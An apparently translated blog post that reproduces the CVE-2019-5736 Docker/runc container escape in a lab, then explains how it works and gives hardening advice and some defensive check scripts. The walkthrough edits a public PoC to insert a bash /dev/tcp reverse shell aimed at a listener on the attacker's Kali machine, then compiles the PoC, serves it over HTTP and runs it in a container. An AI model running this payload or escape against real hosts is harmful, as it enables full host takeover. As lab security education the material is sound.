CVE Vulnerability Reproduction - CVE-2019-5736 Docker Escape

CVE-2019-5736 Docker Escape

What is Docker?

Docker is an open source application container engine that lets developers package an application together with its dependencies into a portable container and then publish it to any popular Linux or Windows machine. Containers are fully sandboxed: each one runs in its own isolated environment, and there is no interface between them.

How does a Docker environment differ from an ordinary production environment? In an ordinary setup, the code our programmers write runs fine in the development environment, yet in the test environment it easily throws all kinds of bugs and error reports, because the configuration and environment of the two machines are different.


Docker was created to solve exactly this problem of environment differences.

For example, a development project needs a lot of environment dependencies configured. When the project has to be migrated to another host or platform, all of those environment dependencies have to be configured and migrated as well, which is quite troublesome.

Likewise, in production we usually set up clustering and load balancing so that multiple servers share one responsibility and spread the access load. After deploying one server, you then need more identical ones; what do you do then? Reinstalling the environment dependencies from scratch on every one of them is very troublesome.

So in the end two problems stand out: environment consistency, and repeated configuration that wastes time. Docker solves both.

You can think of Docker as an image: when we need the same project environment on another server, using Docker is equivalent to copying that environment over, which largely removes the environment differences caused by differing hardware and the need to configure the environment again and again.

So is Docker essentially the same concept as a virtual machine? What is the difference between Docker and a virtual machine?

Comparison of virtual machines and Docker:


Characteristic        Virtual machine                                   Container
Startup               Minutes                                           Seconds
Deployment/creation   Slow                                              Fast
Disk usage            Generally GB                                      Usually MB
Performance           Weaker than native; goes through the hypervisor   Close to native; talks to the kernel directly
Resource utilization  Generally dozens per machine                      A single machine supports thousands of containers
Isolation             System-level isolation, stronger                  Process-level isolation, weaker
Security              Strong                                            Weak

History of container technology development:


Docker usage scenarios:

1. Rapid deployment through images, for example: vulhub.org
2. Environment consistency, for example: deploying applications
3. Higher server utilization and lower cost, for example: installing services
4. Isolating different applications from each other

The composition of Docker

Docker composition:

Core concepts:

  • Image: a packaged application environment, a read-only template; examples: Nginx, Tomcat, MySQL, Taobao Mall, Ubuntu images
  • Container: an image plus a read-write layer, with state: running, paused, stopped
  • Registry (repository): stores images and provides upload and download; the official registry is https://hub.docker.com

Reproduction environment setup

What is Docker escape?

A Docker container is like a small Linux operating system with its own disk, network, processes and user system. Docker escape is the process of obtaining root privileges on the host starting from privileges inside the container; simply put, going from container privileges to the privileges of the host that runs the Docker environment.

Types of Docker escape causes

1. Caused by operating system kernel vulnerabilities: CVE-2016-5195 (Dirty Cow)
2. Caused by Docker’s own vulnerabilities: CVE-2019-5736, CVE-2019-14271
3. Caused by improper configuration and use of Docker

(1) Enable privileged (privileged mode)
(2) Host directory mount (file mount)
(3) Unauthorized access to the Docker remote API leads to escape

Reference link: "Analysis of multiple Docker escape methods"

CVE-2019-5736 environment setup

Vulnerability conditions:

Docker running as root
Docker version < 18.09.2
runc version <= 1.0-rc6
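The two version conditions can be checked mechanically from the output of `docker -v` and `docker-runc -v`. This is an added example, not code from the original post; the sample output strings are constructed, and the root-run-Docker condition must be confirmed separately (for example with `ps -o user= -C dockerd`).

```python
import re
from typing import Dict, Optional, Tuple

Version = Tuple[Tuple[int, int, int], Optional[int]]   # ((major, minor, patch), rc)

FIXED_DOCKER: Version = ((18, 9, 2), None)   # Docker < 18.09.2 is affected
LAST_BAD_RUNC: Version = ((1, 0, 0), 6)      # runc <= 1.0(.0)-rc6 is affected


def parse_version(text: str) -> Optional[Version]:
    """Extract '<major>.<minor>[.<patch>][-rcN]' from a `docker -v` or
    `docker-runc -v` output line. rc is None for a final release; a
    two-part version such as '1.0-rc6' is padded to (1, 0, 0)."""
    m = re.search(r"(\d+(?:\.\d+)+)(?:-rc(\d+))?", text)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) < 3:
        parts.append(0)
    rc = int(m.group(2)) if m.group(2) else None
    return (parts[0], parts[1], parts[2]), rc


def sort_key(v: Version) -> Tuple[int, int, int, int, int]:
    """Order versions so that every -rcN sorts before the final release."""
    (major, minor, patch), rc = v
    return (major, minor, patch, 0 if rc is not None else 1, rc or 0)


def check_cve_2019_5736(docker_v: str, runc_v: str) -> Dict[str, Optional[bool]]:
    """Apply the two version conditions listed above. 'exposed' is True only
    when both hold; None means the version string could not be parsed."""
    docker = parse_version(docker_v)
    runc = parse_version(runc_v)
    docker_bad = None if docker is None else sort_key(docker) < sort_key(FIXED_DOCKER)
    runc_bad = None if runc is None else sort_key(runc) <= sort_key(LAST_BAD_RUNC)
    return {
        "docker_below_18.09.2": docker_bad,
        "runc_at_or_below_1.0-rc6": runc_bad,
        "exposed": bool(docker_bad) and bool(runc_bad),
    }


if __name__ == "__main__":
    # Constructed sample outputs in the format the two commands print.
    print(check_cve_2019_5736("Docker version 18.06.1-ce, build abcdef0",
                              "runc version 1.0.0-rc5"))
```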

Ready-made target machine download

Link: https://pan.baidu.com/s/19uXXlyAUUJLX4wJcwEAUgw?pwd=8888
Target machine password: 123456 (the same for both accounts)

Docker escape demo

Reproduction environment

Machine name   IP
kali           192.168.142.128
centos         192.168.142.166

Start a listener on the Kali machine

nc -lvnp 7777


Check the versions on the target machine

docker -v
docker-runc -v


Start the Docker service (this step requires entering the password 123456)

service docker start


Run a container

docker run -it ubuntu:18.04 "/bin/bash"


Download and compile the exploit script

git clone https://github.com/Frichetten/CVE-2019-5736-PoC
cd /home/kali/桌面/CVE-2019-5736-PoC-master


Edit the PoC file

vim main.go

Add the reverse shell command

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.142.128/7777 0>&1" + shellCmd


Compile the script

First install the Go build environment

yum install epel-release
yum install golang


Compile the PoC

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go


Start an HTTP server on the Kali machine

python -m http.server 7987


Download the PoC on the CentOS machine (the HTTP server above listens on port 7987)

curl -O http://192.168.142.128:7987/main

As shown in the figure, the PoC file has been uploaded to the Docker host.

Then, since what we want is a container escape, the PoC has to run inside the container, so we copy the compiled main binary into the container

View containers

docker container ls -a

Start the container

docker start  501c


Copy the PoC into the container

docker cp ./main  501c:/home


Enter the container shell

docker exec -it 501c /bin/sh
cd /home
ls


Execute the PoC inside the container

chmod 777 main
./main


From CentOS, enter the container again as root

docker exec -it 501c /bin/bash


The reverse shell command executes in the Docker container


The Kali machine receives the session on its listener


Principle analysis

After runc exec has joined the container's namespaces (see how runc works), a process inside the container can already observe the runc process through the container's /proc (the virtual file system). If that process opens /proc/[runc-PID]/exe and writes to it, the runc binary on the host is overwritten.
The next time the user calls runc to execute a command, the instruction planted by the attacker is what actually runs.

Summary: the system's runc file is tampered with and malicious code is added to it, so the malicious code executes on the next runc exec.
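Because the attack leaves the host's runc binary rewritten, a baseline hash of that binary, taken after a trusted install and verified periodically, detects a successful exploit after the fact. This is an added example, not code from the original post; the runc paths are an assumption to adjust per distribution, and the tampering scenario in the demo is constructed in a temporary directory.

```python
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List, Tuple

# Assumed host locations of the runc binary: docker-runc on the older Docker
# releases this page targets, runc on current ones. Adjust to your distribution.
RUNC_CANDIDATES = ["/usr/bin/docker-runc", "/usr/bin/runc", "/usr/local/sbin/runc"]

def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def take_baseline(paths: Iterable[str]) -> Dict[str, str]:
    """Hash every runc binary that exists. Run this right after a trusted
    install or upgrade and keep the result off the host: an attacker who
    can rewrite runc can also rewrite a baseline stored next to it."""
    return {p: sha256_of(p) for p in paths if os.path.isfile(p)}

def verify_baseline(baseline: Dict[str, str]) -> List[str]:
    """Return the binaries whose content no longer matches the baseline.
    A rewritten runc is exactly what the /proc/[runc-PID]/exe overwrite
    leaves behind, so any entry here is an incident, not a warning."""
    return [p for p, digest in baseline.items()
            if not os.path.isfile(p) or sha256_of(p) != digest]

def demo_tamper_detection() -> Tuple[List[str], List[str]]:
    """Constructed scenario: a fake runc binary in a temp dir is baselined,
    then replaced by a script, as the principle analysis above describes."""
    with tempfile.TemporaryDirectory() as d:
        fake_runc = os.path.join(d, "docker-runc")
        with open(fake_runc, "wb") as f:
            f.write(b"\x7fELF fake runc binary (constructed)")
        baseline = take_baseline([fake_runc, os.path.join(d, "runc")])
        before = verify_baseline(baseline)          # nothing changed yet
        with open(fake_runc, "wb") as f:
            f.write(b"#!/bin/bash\n# overwritten content (constructed)\n")
        after = verify_baseline(baseline)           # the rewritten binary
        return before, [os.path.basename(p) for p in after]

if __name__ == "__main__":
    print(demo_tamper_detection())
    # On a real host: store take_baseline(RUNC_CANDIDATES) off-box and have a
    # scheduled job call verify_baseline on it.
```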

Docker security hardening

Docker security detection

Automated exploitation tool: https://github.com/cdk-team/CDK

This tool can detect a number of vulnerabilities in Docker containers and K8s clusters

Docker Hardening Recommendations

1. Upgrade Docker to the latest version
2. Upgrade the Linux kernel
3. It is not recommended to run the Docker service with root privileges
4. It is not recommended to start containers in privileged mode
5. It is not recommended to mount host directories into container directories
6. It is not recommended to start containers with --cap-add=SYS_ADMIN: SYS_ADMIN allows the container process a whole range of system administration operations such as mount and umount, which carries a risk of container escape
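Recommendations 3 to 6 can be audited against a running container's `docker inspect` output (its HostConfig, Config and Mounts sections). This is an added example, not code from the original post; the two inspect documents are constructed samples and the list of sensitive host paths is an assumption.

```python
from typing import Any, Dict, List

# Host paths whose bind-mount into a container undoes the isolation that the
# hardening list above relies on. Assumption: extend this for your environment.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/proc", "/var/run/docker.sock")

def audit_container(inspect: Dict[str, Any]) -> List[str]:
    """Check one element of `docker inspect <container>` output against
    recommendations 3 to 6 above and return the violations found."""
    findings: List[str] = []
    host = inspect.get("HostConfig") or {}
    config = inspect.get("Config") or {}
    user = str(config.get("User") or "")
    if user.split(":")[0] in ("", "0", "root"):
        findings.append("container process runs as root (no --user set)")
    if host.get("Privileged"):
        findings.append("privileged mode enabled (--privileged)")
    for cap in host.get("CapAdd") or []:
        if cap.upper().replace("CAP_", "") in ("SYS_ADMIN", "ALL"):
            findings.append("CAP_SYS_ADMIN added (--cap-add=SYS_ADMIN)")
    for mount in inspect.get("Mounts") or []:
        if mount.get("Type") != "bind":
            continue                     # named volumes are not host directories
        src = mount.get("Source", "")
        src_norm = src.rstrip("/") or "/"
        tag = "SENSITIVE " if src_norm in SENSITIVE_HOST_PATHS else ""
        findings.append(f"{tag}host path {src} mounted at {mount.get('Destination')}")
    return findings

# Constructed samples in the shape of `docker inspect` output, not from a real host.
WEAK_CONTAINER = {
    "Config": {"User": ""},
    "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"]},
    "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host"},
               {"Type": "volume", "Source": "appdata", "Destination": "/data"}],
}
HARDENED_CONTAINER = {
    "Config": {"User": "1000:1000"},
    "HostConfig": {"Privileged": False, "CapAdd": None},
    "Mounts": [],
}

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_CONTAINER), ("hardened", HARDENED_CONTAINER)):
        print(name, audit_container(doc) or ["no findings"])
```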

References:https://mp.weixin.qq.com/s/R5DV0X3QpYmaxVxIexRYgA


Origin blog.csdn.net/qq_64973687/article/details/130301761